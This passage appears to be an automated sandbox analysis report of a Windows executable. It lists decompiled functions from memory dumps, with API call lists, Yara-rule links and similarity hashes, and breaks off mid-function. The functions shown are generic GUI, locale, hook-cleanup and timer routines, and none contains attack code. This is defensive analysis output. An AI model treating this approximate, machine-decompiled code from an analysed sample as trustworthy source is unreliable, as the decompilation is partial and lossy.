                                                                                Function 00420814, Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 70%
                                                                                			E00420814(void* __eax) {
				char _v5;
				struct HDC__* _v12;
				struct HPALETTE__* _t21;
				struct HPALETTE__* _t25;
				void* _t28;
				intOrPtr _t35;
				void* _t37;
				void* _t39;
				intOrPtr _t40;

				_t37 = _t39;
				_t40 = _t39 + 0xfffffff8;
				_t28 = __eax;
				_v5 = 0;
				if( *0x487a28 == 0) {
					return _v5;
				} else {
					_v12 = GetDC(0);
					_push(_t37);
					_push(0x42089a);
					_push( *[fs:edx]);
					 *[fs:edx] = _t40;
					if(GetDeviceCaps(_v12, 0x68) >= 0x10) {
						_t21 =  *0x487a28; // 0xf50806b6
						GetPaletteEntries(_t21, 0, 8, _t28 + 4);
						_t25 =  *0x487a28; // 0xf50806b6
						GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c);
						_v5 = 1;
					}
					_pop(_t35);
					 *[fs:eax] = _t35;
					_push(0x4208a1);
					return ReleaseDC(0, _v12);
				}
			}












                                                                                0x00420815
                                                                                0x00420817
                                                                                0x0042081b
                                                                                0x0042081d
                                                                                0x00420828
                                                                                0x004208a8
                                                                                0x0042082a
                                                                                0x00420831
                                                                                0x00420836
                                                                                0x00420837
                                                                                0x0042083c
                                                                                0x0042083f
                                                                                0x00420850
                                                                                0x0042085a
                                                                                0x00420860
                                                                                0x00420872
                                                                                0x00420878
                                                                                0x0042087d
                                                                                0x0042087d
                                                                                0x00420883
                                                                                0x00420886
                                                                                0x00420889
                                                                                0x00420899
                                                                                0x00420899

                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0042082C
                                                                                • GetDeviceCaps.GDI32(?,00000068), ref: 00420848
                                                                                • GetPaletteEntries.GDI32(F50806B6,00000000,00000008,?), ref: 00420860
                                                                                • GetPaletteEntries.GDI32(F50806B6,00000008,00000008,?), ref: 00420878
                                                                                • ReleaseDC.USER32 ref: 00420894
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: EntriesPalette$CapsDeviceRelease
                                                                                • String ID:
                                                                                • API String ID: 3128150645-0
                                                                                • Opcode ID: 46e97d3204053474f55297d2e6610e9d4d995723f1aca5551efd4b60e66d0a59
                                                                                • Instruction ID: 594b4552e34af1e9033683bc2504567bb3921c278d2cf1e53935ece89b8d96ff
                                                                                • Opcode Fuzzy Hash: 46e97d3204053474f55297d2e6610e9d4d995723f1aca5551efd4b60e66d0a59
                                                                                • Instruction Fuzzy Hash: F81148317483046EEB00EBA4EC92F6E7BE8E708714F5040AAF604EA5C1C9B99404C368
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00461FD4, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 65%
                                                                                			E00461FD4(void* __eax) {
				struct HDC__* _v8;
				int _t13;
				void* _t25;
				intOrPtr _t32;
				int _t35;
				intOrPtr _t37;
				intOrPtr _t39;

				_t37 = _t39;
				_t25 = __eax;
				if( *((char*)(__eax + 0x2e8)) == 1) {
					return __eax;
				} else {
					_v8 = GetDC(0);
					_push(_t37);
					_push(0x462059);
					_push( *[fs:eax]);
					 *[fs:eax] = _t39;
					_t13 = GetDeviceCaps(_v8, 0x5a);
					_t35 = MulDiv(E0041EDD0( *((intOrPtr*)(_t25 + 0x68))), _t13, 0x48);
					 *(_t25 + 0x2b0) = _t35;
					E0045F9D0(_t25, MulDiv(_t35, 0x78, 0x64));
					 *((intOrPtr*)(_t25 + 0x2e4)) =  *((intOrPtr*)(_t25 + 0x234));
					_pop(_t32);
					 *[fs:eax] = _t32;
					_push(0x462060);
					return ReleaseDC(0, _v8);
				}
			}










                                                                                0x00461fd5
                                                                                0x00461fda
                                                                                0x00461fe3
                                                                                0x00462064
                                                                                0x00461fe5
                                                                                0x00461fec
                                                                                0x00461ff1
                                                                                0x00461ff2
                                                                                0x00461ff7
                                                                                0x00461ffa
                                                                                0x00462005
                                                                                0x00462019
                                                                                0x0046201b
                                                                                0x0046202f
                                                                                0x0046203a
                                                                                0x00462042
                                                                                0x00462045
                                                                                0x00462048
                                                                                0x00462058
                                                                                0x00462058

                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 00461FE7
                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 00462005
                                                                                  • Part of subcall function 0041EDD0: MulDiv.KERNEL32(00000000,00000048,?), ref: 0041EDE1
                                                                                • MulDiv.KERNEL32(00000000,00000000,?), ref: 00462014
                                                                                • MulDiv.KERNEL32(00000000,00000078,00000064), ref: 00462026
                                                                                • ReleaseDC.USER32 ref: 00462053
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CapsDeviceRelease
                                                                                • String ID:
                                                                                • API String ID: 127614599-0
                                                                                • Opcode ID: 81a1225c8f66191a4a7340aa42bca49ced41bc4e24999cd6ac80d4dc4a324277
                                                                                • Instruction ID: c87c45dc7123c015144318748a061a248af25c350a3f3b7478ec6eef4c47663c
                                                                                • Opcode Fuzzy Hash: 81a1225c8f66191a4a7340aa42bca49ced41bc4e24999cd6ac80d4dc4a324277
                                                                                • Instruction Fuzzy Hash: A501D2B17887047FE700EB65CD46B5A3798DB45704F11007AFA08EB2C2D5BD5C0087A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409B90, Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 64%
                                                                                			E00409B90(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x409c27);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00409908(GetThreadLocale(), 0x409c3c, 0x100b,  &_v8);
				_t29 = E00408708(0x409c3c, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409ADC, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x48781c;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409B18, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E00409C2E);
				return E00404320( &_v8);
			}










                                                                                0x00409b90
                                                                                0x00409b93
                                                                                0x00409b98
                                                                                0x00409b99
                                                                                0x00409b9e
                                                                                0x00409ba1
                                                                                0x00409bb7
                                                                                0x00409bc9
                                                                                0x00409bd3
                                                                                0x00409be3
                                                                                0x00409be8
                                                                                0x00409bed
                                                                                0x00409bf2
                                                                                0x00409bf2
                                                                                0x00409bf8
                                                                                0x00409bfb
                                                                                0x00409bfb
                                                                                0x00409c0c
                                                                                0x00409c0c
                                                                                0x00409c13
                                                                                0x00409c16
                                                                                0x00409c19
                                                                                0x00409c26

                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(?,00000000,00409C27,?,?,00000000), ref: 00409BA8
                                                                                  • Part of subcall function 00409908: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409926
                                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409C27,?,?,00000000), ref: 00409BD8
                                                                                • EnumCalendarInfoA.KERNEL32(Function_00009ADC,00000000,00000000,00000004), ref: 00409BE3
                                                                                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409C27,?,?,00000000), ref: 00409C01
                                                                                • EnumCalendarInfoA.KERNEL32(Function_00009B18,00000000,00000000,00000003), ref: 00409C0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                                • String ID:
                                                                                • API String ID: 4102113445-0
                                                                                • Opcode ID: f9b5190e816450cd29884f56873aa7a7404d889235a34cc2af808d8aafdeda29
                                                                                • Instruction ID: 4bfb94394b26c1de61b809fad384f0f37ea96256bdb679008e2ec987b4910443
                                                                                • Opcode Fuzzy Hash: f9b5190e816450cd29884f56873aa7a7404d889235a34cc2af808d8aafdeda29
                                                                                • Instruction Fuzzy Hash: 4201F7717042046BE70176658D12B5E729CDB86724FB14536F501FB6C2D67C9E00466C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00453F88, Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00453F88() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x487c14 != 0) {
					_t10 =  *0x487c14; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x487c14 = 0;
				if( *0x487c18 != 0) {
					_t2 =  *0x487c10; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x487c0c) {
						_t8 =  *0x487c18; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x487c18; // 0x0
					CloseHandle(_t5);
					 *0x487c18 = 0;
					return 0;
				}
				return 0;
			}







                                                                                0x00453f8f
                                                                                0x00453f91
                                                                                0x00453f97
                                                                                0x00453f97
                                                                                0x00453f9e
                                                                                0x00453faa
                                                                                0x00453fac
                                                                                0x00453fb2
                                                                                0x00453fc2
                                                                                0x00453fc6
                                                                                0x00453fcc
                                                                                0x00453fcc
                                                                                0x00453fd1
                                                                                0x00453fd7
                                                                                0x00453fde
                                                                                0x00000000
                                                                                0x00453fde
                                                                                0x00453fe3

                                                                                APIs
                                                                                • UnhookWindowsHookEx.USER32(00000000), ref: 00453F97
                                                                                • SetEvent.KERNEL32(00000000,00456232,00000000,0045530F,?,?,0046AE10,00000001,004553CF,?,?,?,0046AE10), ref: 00453FB2
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00453FB7
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00456232,00000000,0045530F,?,?,0046AE10,00000001,004553CF,?,?,?,0046AE10), ref: 00453FCC
                                                                                • CloseHandle.KERNEL32(00000000,00000000,00456232,00000000,0045530F,?,?,0046AE10,00000001,004553CF,?,?,?,0046AE10), ref: 00453FD7
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                                • String ID:
                                                                                • API String ID: 2429646606-0
                                                                                • Opcode ID: b04f38ba4defd6c5de64de1a433f38defa01984694019d89562f8b4e7c6d09ea
                                                                                • Instruction ID: a3b23e4da45633cf8d10c80a91931710e342de8fee76660524c995d76fe24a38
                                                                                • Opcode Fuzzy Hash: b04f38ba4defd6c5de64de1a433f38defa01984694019d89562f8b4e7c6d09ea
                                                                                • Instruction Fuzzy Hash: E1F09E7290D1009AC750EB79DE99A4D33E86704395B204D3EB211D72A1DA38D5C48BBD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045EE44, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 276timeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 95%
                                                                                			E0045EE44(intOrPtr* __eax, signed int __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				signed int _v9;
				signed int _v16;
				signed int _v20;
				char _v21;
				char _v124;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t145;
				intOrPtr _t169;
				intOrPtr _t171;
				intOrPtr _t172;
				intOrPtr _t173;
				signed int _t177;
				signed int _t184;
				intOrPtr _t193;
				signed int _t197;
				signed int _t204;
				intOrPtr _t213;
				intOrPtr _t215;
				signed int _t224;
				signed int _t237;
				signed int _t240;
				void* _t248;
				void* _t252;
				signed int _t253;
				intOrPtr _t268;
				intOrPtr _t284;
				void* _t295;
				signed int _t297;
				intOrPtr _t304;

				_v9 = __ecx;
				_t253 = __edx;
				_v8 = __eax;
				_t294 = _a8;
				_v21 = 0;
				E0045FCF8(_v8, __edx, _a8, _t295);
				_t145 = _v8;
				_t305 =  *(_t145 + 0x1c) & 0x00000010;
				if(( *(_t145 + 0x1c) & 0x00000010) != 0) {
					L5:
					__eflags = _t253;
					if(_t253 != 0) {
						L8:
						__eflags = _t253;
						if(_t253 != 0) {
							L37:
							_push(0x45f1ef);
							_push( *[fs:eax]);
							 *[fs:eax] = _t304;
							E00436C60(_v8, _t253, _a4, _t294);
							_pop(_t268);
							 *[fs:eax] = _t268;
							return 0;
						}
						E0045C76C(_v8,  &_v124);
						_t296 =  *_v8;
						 *((intOrPtr*)( *_v8 + 0xc8))( &_v124, _v8 + 0x268, _v8 + 0x264, _v8 + 0x260, _v8 + 0x28e);
						__eflags =  *((char*)(_v8 + 0x28e));
						if(__eflags != 0) {
							__eflags =  *((char*)(_v8 + 0x28e)) - 3;
							if(__eflags == 0) {
								_t296 = 0xffc8;
								_t237 = E004037B0(_v8, __eflags);
								__eflags = _t237;
								if(_t237 != 0) {
									_t240 = E004350A4(_v8) -  *(_v8 + 0x264);
									__eflags = _t240;
									 *(_v8 + 0x264) = _t240;
								}
							}
							return E0045D160(_v8, _t253,  &_v124, _t294, _t296);
						}
						_t259 = _a4;
						E0045C710(_v8, _a4, _t294, __eflags,  &_v20,  &_v124);
						_t169 = _v8;
						_t297 = _v20;
						__eflags =  *((intOrPtr*)(_t169 + 0x238)) - _t297;
						if( *((intOrPtr*)(_t169 + 0x238)) > _t297) {
							L25:
							_t171 = _v8;
							__eflags =  *(_t171 + 0x249) & 0x00000001;
							if(( *(_t171 + 0x249) & 0x00000001) == 0) {
								L31:
								_t172 = _v8;
								__eflags =  *(_t172 + 0x249) & 0x00000002;
								if(( *(_t172 + 0x249) & 0x00000002) != 0) {
									__eflags = _v16;
									if(_v16 >= 0) {
										_t173 = _v8;
										__eflags =  *((intOrPtr*)(_t173 + 0x23c)) - _v16;
										if( *((intOrPtr*)(_t173 + 0x23c)) > _v16) {
											__eflags =  *((intOrPtr*)(_v8 + 0x238)) - _v20;
											if(__eflags <= 0) {
												_t177 = _v20;
												 *((intOrPtr*)(_v8 + 0x26c)) = _t177;
												 *((intOrPtr*)(_v8 + 0x270)) = _t177;
												E0041295C(_t294,  &_v132, _a4);
												_push( &_v132);
												_t184 = E004037B0(_v8, __eflags);
												__eflags = _t184;
												if(_t184 != 0) {
													 *((char*)(_v8 + 0x28e)) = 5;
													 *((intOrPtr*)( *_v8 + 0x88))();
													E0045D2A0(_v8, _t253, _t294, 0xffa3);
													_v21 = 1;
													SetTimer(E0043BD14(_v8), 1, 0x3c, 0);
												}
											}
										}
									}
								}
								goto L37;
							}
							__eflags = _v20;
							if(_v20 < 0) {
								goto L31;
							}
							_t193 = _v8;
							__eflags =  *((intOrPtr*)(_t193 + 0x238)) - _v20;
							if( *((intOrPtr*)(_t193 + 0x238)) <= _v20) {
								goto L31;
							}
							__eflags =  *((intOrPtr*)(_v8 + 0x23c)) - _v16;
							if(__eflags > 0) {
								goto L31;
							}
							_t197 = _v16;
							 *((intOrPtr*)(_v8 + 0x26c)) = _t197;
							 *((intOrPtr*)(_v8 + 0x270)) = _t197;
							E0041295C(_t294,  &_v132, _a4);
							_push( &_v132);
							_t204 = E004037B0(_v8, __eflags);
							__eflags = _t204;
							if(_t204 != 0) {
								 *((char*)(_v8 + 0x28e)) = 4;
								 *((intOrPtr*)( *_v8 + 0x88))();
								E0045D2A0(_v8, _t253, _t294, 0xffa2);
								_v21 = 1;
								SetTimer(E0043BD14(_v8), 1, 0x3c, 0);
							}
							goto L37;
						}
						_t213 = _v8;
						__eflags =  *((intOrPtr*)(_t213 + 0x23c)) - _v16;
						if( *((intOrPtr*)(_t213 + 0x23c)) > _v16) {
							goto L25;
						}
						_t215 = _v8;
						__eflags =  *(_t215 + 0x249) & 0x00000004;
						if(( *(_t215 + 0x249) & 0x00000004) == 0) {
							 *((char*)(_v8 + 0x28e)) = 1;
							SetTimer(E0043BD14(_v8), 1, 0x3c, 0);
							__eflags = _v9 & 0x00000001;
							if((_v9 & 0x00000001) == 0) {
								E0045DDD8(_v8, _t253, _v16, _t297, _t294, _t297, 1, 1);
							} else {
								E0045DD50(_v8, _t259,  &_v20, _t294);
							}
							goto L37;
						}
						_t284 = _v8;
						_t224 = _v20;
						__eflags =  *((intOrPtr*)(_t284 + 0x228)) - _t224;
						if( *((intOrPtr*)(_t284 + 0x228)) != _t224) {
							L20:
							E0045DDD8(_v8, _t253, _v16, _t224, _t294, _t297, 1, 1);
							E0045FDD4(_v8, _t294, _t297);
							L21:
							E004037B0(_v8, __eflags);
							goto L37;
						}
						__eflags =  *((intOrPtr*)(_v8 + 0x22c)) - _v16;
						if(__eflags != 0) {
							goto L20;
						}
						E0045B6B8(_v8);
						goto L21;
					}
					__eflags = _v9 & 0x00000040;
					if(__eflags == 0) {
						goto L8;
					} else {
						E004037B0(_v8, __eflags);
						goto L37;
					}
				}
				if(E004037B0(_v8, _t305) != 0) {
					L3:
					 *((intOrPtr*)( *_v8 + 0xc0))();
					_t248 = E0045B628(_v8, _t307);
					_t308 = _t248;
					if(_t248 == 0) {
						return E004358D8(_v8, 0, _t308);
					}
					goto L5;
				}
				_t252 = E0044CA54(_v8);
				_t307 = _t252;
				if(_t252 != 0) {
					goto L5;
				}
				goto L3;
			}





































                                                                                0x0045ee4d
                                                                                0x0045ee50
                                                                                0x0045ee52
                                                                                0x0045ee55
                                                                                0x0045ee58
                                                                                0x0045ee5f
                                                                                0x0045ee64
                                                                                0x0045ee67
                                                                                0x0045ee6b
                                                                                0x0045eeaf
                                                                                0x0045eeaf
                                                                                0x0045eeb1
                                                                                0x0045eeca
                                                                                0x0045eeca
                                                                                0x0045eecc
                                                                                0x0045f1c5
                                                                                0x0045f1c8
                                                                                0x0045f1cd
                                                                                0x0045f1d0
                                                                                0x0045f1e0
                                                                                0x0045f1e7
                                                                                0x0045f1ea
                                                                                0x00000000
                                                                                0x0045f1ea
                                                                                0x0045eed8
                                                                                0x0045ef0d
                                                                                0x0045ef0f
                                                                                0x0045ef18
                                                                                0x0045ef1f
                                                                                0x0045ef24
                                                                                0x0045ef2b
                                                                                0x0045ef30
                                                                                0x0045ef34
                                                                                0x0045ef39
                                                                                0x0045ef3b
                                                                                0x0045ef48
                                                                                0x0045ef48
                                                                                0x0045ef51
                                                                                0x0045ef51
                                                                                0x0045ef3b
                                                                                0x00000000
                                                                                0x0045ef5d
                                                                                0x0045ef6f
                                                                                0x0045ef77
                                                                                0x0045ef7c
                                                                                0x0045ef85
                                                                                0x0045ef88
                                                                                0x0045ef8a
                                                                                0x0045f04a
                                                                                0x0045f04a
                                                                                0x0045f04d
                                                                                0x0045f054
                                                                                0x0045f10e
                                                                                0x0045f10e
                                                                                0x0045f111
                                                                                0x0045f118
                                                                                0x0045f11e
                                                                                0x0045f122
                                                                                0x0045f128
                                                                                0x0045f131
                                                                                0x0045f134
                                                                                0x0045f143
                                                                                0x0045f146
                                                                                0x0045f14b
                                                                                0x0045f14e
                                                                                0x0045f157
                                                                                0x0045f165
                                                                                0x0045f16d
                                                                                0x0045f187
                                                                                0x0045f18c
                                                                                0x0045f18e
                                                                                0x0045f193
                                                                                0x0045f19f
                                                                                0x0045f1a8
                                                                                0x0045f1ad
                                                                                0x0045f1c0
                                                                                0x0045f1c0
                                                                                0x0045f18e
                                                                                0x0045f146
                                                                                0x0045f134
                                                                                0x0045f122
                                                                                0x00000000
                                                                                0x0045f118
                                                                                0x0045f05a
                                                                                0x0045f05e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045f064
                                                                                0x0045f06d
                                                                                0x0045f070
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045f07f
                                                                                0x0045f082
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045f08b
                                                                                0x0045f08e
                                                                                0x0045f097
                                                                                0x0045f0a5
                                                                                0x0045f0ad
                                                                                0x0045f0c7
                                                                                0x0045f0cc
                                                                                0x0045f0ce
                                                                                0x0045f0d7
                                                                                0x0045f0e3
                                                                                0x0045f0ec
                                                                                0x0045f0f1
                                                                                0x0045f104
                                                                                0x0045f104
                                                                                0x00000000
                                                                                0x0045f0ce
                                                                                0x0045ef90
                                                                                0x0045ef99
                                                                                0x0045ef9c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045efa2
                                                                                0x0045efa5
                                                                                0x0045efac
                                                                                0x0045f003
                                                                                0x0045f019
                                                                                0x0045f01e
                                                                                0x0045f022
                                                                                0x0045f040
                                                                                0x0045f024
                                                                                0x0045f02a
                                                                                0x0045f02a
                                                                                0x00000000
                                                                                0x0045f022
                                                                                0x0045efae
                                                                                0x0045efb7
                                                                                0x0045efba
                                                                                0x0045efbc
                                                                                0x0045efd6
                                                                                0x0045efe2
                                                                                0x0045efea
                                                                                0x0045efef
                                                                                0x0045eff6
                                                                                0x00000000
                                                                                0x0045eff6
                                                                                0x0045efc7
                                                                                0x0045efca
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045efcf
                                                                                0x00000000
                                                                                0x0045efcf
                                                                                0x0045eeb3
                                                                                0x0045eeb7
                                                                                0x00000000
                                                                                0x0045eeb9
                                                                                0x0045eec0
                                                                                0x00000000
                                                                                0x0045eec0
                                                                                0x0045eeb7
                                                                                0x0045ee7b
                                                                                0x0045ee89
                                                                                0x0045ee8e
                                                                                0x0045ee97
                                                                                0x0045ee9c
                                                                                0x0045ee9e
                                                                                0x00000000
                                                                                0x0045eea5
                                                                                0x00000000
                                                                                0x0045ee9e
                                                                                0x0045ee80
                                                                                0x0045ee85
                                                                                0x0045ee87
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F019
                                                                                • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F104
                                                                                • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F1C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Timer
                                                                                • String ID: @
                                                                                • API String ID: 2870079774-2766056989
                                                                                • Opcode ID: b749929822256d500e5e7cd3c26b9152d8cdae2a96eb2474c38fca25822bfe95
                                                                                • Instruction ID: 31ec200aa90f8bbc8c52e6f19b9a0b11fb317160e962f7965f8f07b22054e6eb
                                                                                • Opcode Fuzzy Hash: b749929822256d500e5e7cd3c26b9152d8cdae2a96eb2474c38fca25822bfe95
                                                                                • Instruction Fuzzy Hash: 3AC13D34A00209EFDB10DB99C589BDEB7F5AF44305F2441A6EC04AB392D778AF49DB45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409C40, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E00409C40(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x409e0a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00404320(__edx);
				E00409908(GetThreadLocale(), 0x409e20, 0x1009,  &_v12);
				if(E00408708(0x409e20, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E004045D8(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x46b0c0], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E00408C80(_t124 + _t92 - 1, 2, 0x409e24);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E00408C80(_t124 + _t92 - 1, 4, 0x409e34);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E00408C80(_t124 + _t92 - 1, 2, 0x409e4c);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E004045E0(_t122, 0x409e64);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404500();
												E004045E0(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E004045E0(_t122, 0x409e58);
										_t92 = _t92 + 1;
									}
								} else {
									E004045E0(_t122, 0x409e44);
									_t92 = _t92 + 3;
								}
							} else {
								E004045E0(_t122, 0x409e30);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040A988(_t124, _t92);
							E00404830(_t124, _v8, _t92,  &_v20);
							E004045E0(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x4877f4; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00404374(_t122, _t124);
					} else {
						while(_t92 <= E004045D8(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404500();
									E004045E0(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
